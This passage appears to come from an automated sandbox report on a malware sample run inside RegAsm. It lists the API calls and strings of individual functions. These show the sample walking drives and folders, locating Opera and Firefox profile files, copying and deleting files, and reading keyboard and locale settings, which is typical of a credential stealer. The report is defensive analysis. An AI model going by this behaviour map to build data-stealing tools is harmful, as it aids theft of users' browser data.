                                                                                    Function 00415AC2 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 133stringfileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00415AC7
                                                                                    • wsprintfA.USER32 ref: 00415AEA
                                                                                    • FindFirstFileA.KERNEL32(?,?), ref: 00415B01
                                                                                    • StrCmpCA.SHLWAPI(?,0042687C), ref: 00415B23
                                                                                    • StrCmpCA.SHLWAPI(?,00426880), ref: 00415B3D
                                                                                    • lstrcat.KERNEL32(?,?), ref: 00415B72
                                                                                    • lstrcat.KERNEL32(?), ref: 00415B85
                                                                                    • lstrcat.KERNEL32(?,?), ref: 00415B99
                                                                                    • lstrcat.KERNEL32(?,?), ref: 00415BA9
                                                                                    • lstrcat.KERNEL32(?,00426884), ref: 00415BBB
                                                                                    • lstrcat.KERNEL32(?,?), ref: 00415BCF
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 0040618B: _EH_prolog.MSVCRT ref: 00406190
                                                                                      • Part of subcall function 0040618B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061B3
                                                                                      • Part of subcall function 0040618B: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004061CA
                                                                                      • Part of subcall function 0040618B: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061E6
                                                                                      • Part of subcall function 0040618B: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406200
                                                                                      • Part of subcall function 0040618B: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406221
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
                                                                                      • Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                                      • Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                                    • FindNextFileA.KERNEL32(00000000,?), ref: 00415C69
                                                                                    • FindClose.KERNEL32(00000000), ref: 00415C78
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcat$File$H_prolog$Find$CloseCreate$AllocFirstHandleLocalNextObjectReadSingleSizeThreadWaitlstrcpywsprintf
                                                                                    • String ID: %s\%s
                                                                                    • API String ID: 2282932919-4073750446
                                                                                    • Opcode ID: 8a485682f3bd560c78555ff2535f4c5e4a83989996905e60acd5c30d46b0b76a
                                                                                    • Instruction ID: 88f705c6070867334dedd45070e8c549d2cf59d2b969f0f0e11c1cc9a72add11
                                                                                    • Opcode Fuzzy Hash: 8a485682f3bd560c78555ff2535f4c5e4a83989996905e60acd5c30d46b0b76a
                                                                                    • Instruction Fuzzy Hash: 68512D7290022DABDF11EBA1DD49EDE7B7CAF49304F0004AAE509E3151E7389785CBA4
                                                                                    Function 00409F72 Relevance: 23.4, APIs: 8, Strings: 5, Instructions: 628fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00409F77
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,?,?,00425BAE,00000000,-00000020,00000000), ref: 00409FF6
                                                                                    • StrCmpCA.SHLWAPI(?,00425E10), ref: 0040A050
                                                                                    • StrCmpCA.SHLWAPI(?,00425E14), ref: 0040A06A
                                                                                    • StrCmpCA.SHLWAPI(00000000,Opera,00425BBB,00425BBA,00425BB7,00425BB6,00425BB3,00425BB2,00425BAF), ref: 0040A0FD
                                                                                    • StrCmpCA.SHLWAPI(00000000,Opera GX), ref: 0040A111
                                                                                    • StrCmpCA.SHLWAPI(00000000,Opera Crypto), ref: 0040A125
                                                                                      • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prologlstrcpy$lstrcat$FileFindFirstlstrlen
                                                                                    • String ID: 7$Opera$Opera Crypto$Opera GX$\*.*
                                                                                    • API String ID: 3869166975-536343317
                                                                                    • Opcode ID: 6e383192cdb746ddf89457e756fd6650634d6981f08b0559ee31f2275b45e7bd
                                                                                    • Instruction ID: 1112d73afc027f2f7bfb5dc7aaaada1126a1c892b2eba4476be0d084da770975
                                                                                    • Opcode Fuzzy Hash: 6e383192cdb746ddf89457e756fd6650634d6981f08b0559ee31f2275b45e7bd
                                                                                    • Instruction Fuzzy Hash: F6424B70904288EACB15EBE5C955BDDBBB4AF19308F5040BEE409736C2DB781B4CDB66
                                                                                    Function 00415843 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 151stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00415848
                                                                                    • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004158AA
                                                                                    • memset.MSVCRT ref: 004158C9
                                                                                    • GetDriveTypeA.KERNEL32(?), ref: 004158D2
                                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 004158F2
                                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 00415910
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 004153F6: _EH_prolog.MSVCRT ref: 004153FB
                                                                                      • Part of subcall function 004153F6: wsprintfA.USER32 ref: 00415421
                                                                                      • Part of subcall function 004153F6: FindFirstFileA.KERNEL32(?,?), ref: 00415438
                                                                                      • Part of subcall function 004153F6: memset.MSVCRT ref: 0041544F
                                                                                      • Part of subcall function 004153F6: memset.MSVCRT ref: 0041545D
                                                                                      • Part of subcall function 004153F6: StrCmpCA.SHLWAPI(?,004267F4), ref: 0041547B
                                                                                      • Part of subcall function 004153F6: StrCmpCA.SHLWAPI(?,004267F8), ref: 00415495
                                                                                      • Part of subcall function 004153F6: wsprintfA.USER32 ref: 004154B9
                                                                                      • Part of subcall function 004153F6: StrCmpCA.SHLWAPI(?,00426516), ref: 004154CA
                                                                                      • Part of subcall function 004153F6: wsprintfA.USER32 ref: 004154F0
                                                                                      • Part of subcall function 004153F6: memset.MSVCRT ref: 00415516
                                                                                      • Part of subcall function 004153F6: lstrcat.KERNEL32(?,?), ref: 00415528
                                                                                      • Part of subcall function 004153F6: strtok_s.MSVCRT ref: 00415561
                                                                                      • Part of subcall function 004153F6: memset.MSVCRT ref: 00415576
                                                                                      • Part of subcall function 004153F6: lstrcat.KERNEL32(?,?), ref: 0041558B
                                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 00415933
                                                                                    • lstrlenA.KERNEL32(?), ref: 00415998
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: memset$H_prologlstrcpywsprintf$Drivelstrcat$FileFindFirstLogicalStringsTypelstrlenstrtok_s
                                                                                    • String ID: %DRIVE_FIXED%$%DRIVE_REMOVABLE%$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*
                                                                                    • API String ID: 2879972474-147700698
                                                                                    • Opcode ID: e50e932db34735ec1e1f7d5ed1c1354268d54e004d92e1bad43fc9aee28c9db4
                                                                                    • Instruction ID: 4715bdd0870850b2207078c54e98d1efd7a256ad646b0eee288a0e2f42291a72
                                                                                    • Opcode Fuzzy Hash: e50e932db34735ec1e1f7d5ed1c1354268d54e004d92e1bad43fc9aee28c9db4
                                                                                    • Instruction Fuzzy Hash: 095170B190029CEADF30EF61DC55EEF7B7DAF05304F50003ABA15A2191DB386A89CB95
                                                                                    Function 00401162 Relevance: 20.0, APIs: 9, Strings: 2, Instructions: 771fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00401167
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00422374,?,?,?,00422370,?,?,00000000,?,00000000), ref: 004013AC
                                                                                    • StrCmpCA.SHLWAPI(?,00422378), ref: 004013CA
                                                                                    • StrCmpCA.SHLWAPI(?,0042237C), ref: 004013E4
                                                                                    • FindFirstFileA.KERNEL32(00000000,?,?,?,?,00422388,?,?,?,00422384,?,?,?,00422380,?,?), ref: 00401510
                                                                                      • Part of subcall function 00410D21: SHGetFolderPathA.SHELL32(00000000,;\B,00000000,00000000,?), ref: 00410D52
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 00410B5C: _EH_prolog.MSVCRT ref: 00410B61
                                                                                      • Part of subcall function 00410B5C: GetSystemTime.KERNEL32(?,00426440,00000001,000000C8,00000000,00426562), ref: 00410BA1
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 0040618B: _EH_prolog.MSVCRT ref: 00406190
                                                                                      • Part of subcall function 0040618B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061B3
                                                                                      • Part of subcall function 0040618B: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004061CA
                                                                                      • Part of subcall function 0040618B: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061E6
                                                                                      • Part of subcall function 0040618B: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406200
                                                                                      • Part of subcall function 0040618B: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406221
                                                                                    • FindNextFileA.KERNEL32(00000000,?,?,?,?,?,?,0042238C), ref: 00401832
                                                                                    • FindClose.KERNEL32(00000000,?,?,?,?,?,0042238C), ref: 00401841
                                                                                    • FindNextFileA.KERNEL32(?,?), ref: 00401BD4
                                                                                    • FindClose.KERNEL32(?), ref: 00401BE5
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
                                                                                      • Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                                      • Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                                      • Part of subcall function 00410CDD: _EH_prolog.MSVCRT ref: 00410CE2
                                                                                      • Part of subcall function 00410CDD: GetFileAttributesA.KERNEL32(00000000,?,0040BAC2,?,00425BF6,?,?), ref: 00410CF6
                                                                                      • Part of subcall function 0040618B: LocalFree.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406216
                                                                                      • Part of subcall function 00414437: Sleep.KERNEL32(000003E8,?,?,?,?,?,00000000), ref: 004144C0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FileH_prolog$Find$lstrcpy$Close$CreateFirstLocalNextlstrcat$AllocAttributesFolderFreeHandleObjectPathReadSingleSizeSleepSystemThreadTimeWaitlstrlen
                                                                                    • String ID: 7$\*.*
                                                                                    • API String ID: 40499504-4165053604
                                                                                    • Opcode ID: 2415c5a552409a1327100fa76e5c65bacbb48c19f6e4dd66bfc40bef1be4ee54
                                                                                    • Instruction ID: 8097af2253b6e43ffd1ff437b79a581fef85e219c3474a36129b1183f2ad689d
                                                                                    • Opcode Fuzzy Hash: 2415c5a552409a1327100fa76e5c65bacbb48c19f6e4dd66bfc40bef1be4ee54
                                                                                    • Instruction Fuzzy Hash: 04624D70904188EADB15EBE5C955BDDBBB8AF29308F5040BEA509735C2DF781B4CCB25
                                                                                    Function 0040B463 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 311fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 0040B468
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,00425F10,?,?,00425BEF,?,00000000,?), ref: 0040B4E7
                                                                                    • StrCmpCA.SHLWAPI(?,00425F14,?,00000000,?), ref: 0040B50B
                                                                                    • StrCmpCA.SHLWAPI(?,00425F18,?,00000000,?), ref: 0040B525
                                                                                    • StrCmpCA.SHLWAPI(?,prefs.js,00000000,?,?,?,00425F1C,?,?,00425BF2,?,00000000,?), ref: 0040B5C1
                                                                                      • Part of subcall function 00410B5C: _EH_prolog.MSVCRT ref: 00410B61
                                                                                      • Part of subcall function 00410B5C: GetSystemTime.KERNEL32(?,00426440,00000001,000000C8,00000000,00426562), ref: 00410BA1
                                                                                    • CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,?,00425F2C,?,?,00000000,00425BF3,?,00000000,?), ref: 0040B6C6
                                                                                    • DeleteFileA.KERNEL32(00000000,?,?,?,?,?,?), ref: 0040B79B
                                                                                    • FindNextFileA.KERNELBASE(?,?,?,00000000,?), ref: 0040B84A
                                                                                    • FindClose.KERNEL32(?,?,00000000,?), ref: 0040B85B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FileH_prologlstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextSystemTimelstrlen
                                                                                    • String ID: prefs.js
                                                                                    • API String ID: 2318033617-3783873740
                                                                                    • Opcode ID: 5d5855e90322f171bdcc3e902ad36419314a4be2ab95842e86b6b9ed6f14b737
                                                                                    • Instruction ID: ee987ab292ce5c8f0602a9b5561e4dc2d57f8a603593be12f89c118a2121006c
                                                                                    • Opcode Fuzzy Hash: 5d5855e90322f171bdcc3e902ad36419314a4be2ab95842e86b6b9ed6f14b737
                                                                                    • Instruction Fuzzy Hash: D5D18471900248EADB14EBE5C956BDDBBB4AF19304F5040BEE409B36C2DB785B4CCB66
                                                                                    Function 004094E5 Relevance: 15.3, APIs: 10, Instructions: 301fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 004094EA
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,00425DC4,?,?,00425BA2,?), ref: 00409567
                                                                                    • StrCmpCA.SHLWAPI(?,00425DC8), ref: 00409584
                                                                                    • StrCmpCA.SHLWAPI(?,00425DCC), ref: 0040959E
                                                                                    • StrCmpCA.SHLWAPI(?,00000000,?,?,?,00425DD0,?,?,00425BA3), ref: 00409635
                                                                                    • StrCmpCA.SHLWAPI(?), ref: 004096B6
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 00408759: _EH_prolog.MSVCRT ref: 0040875E
                                                                                      • Part of subcall function 00408759: CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,00000000,00000000,?,00425D70,?,?,?,00425B92,00000000), ref: 00408841
                                                                                    • FindNextFileA.KERNELBASE(00000000,?), ref: 0040989F
                                                                                    • FindClose.KERNEL32(00000000), ref: 004098AE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prologlstrcpy$FileFind$lstrcat$CloseCopyFirstNextlstrlen
                                                                                    • String ID:
                                                                                    • API String ID: 322284088-0
                                                                                    • Opcode ID: c7d6cc988ba782d8cbd6a4dc9e280d496fe71cb906df9d5859f326619e4a8ed7
                                                                                    • Instruction ID: 4c01649d4d81a67c5449674785cae23a0a495e6994ebb05e8901edf346d892d0
                                                                                    • Opcode Fuzzy Hash: c7d6cc988ba782d8cbd6a4dc9e280d496fe71cb906df9d5859f326619e4a8ed7
                                                                                    • Instruction Fuzzy Hash: 23C17270900249EADF10EBA5C9167DDBFB8AF09304F10417EE844B36C2DB785B08CBA6
                                                                                    Function 0040FCE5 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 96memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 0040FCEA
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                    • GetKeyboardLayoutList.USER32(00000000,00000000,00426257,00000001,?,00000000), ref: 0040FD1C
                                                                                    • LocalAlloc.KERNEL32(00000040,00000000,?,00000000), ref: 0040FD2A
                                                                                    • GetKeyboardLayoutList.USER32(00000000,00000000,?,00000000), ref: 0040FD35
                                                                                    • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,?,00000000), ref: 0040FD5F
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                    • LocalFree.KERNEL32(?), ref: 0040FE03
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
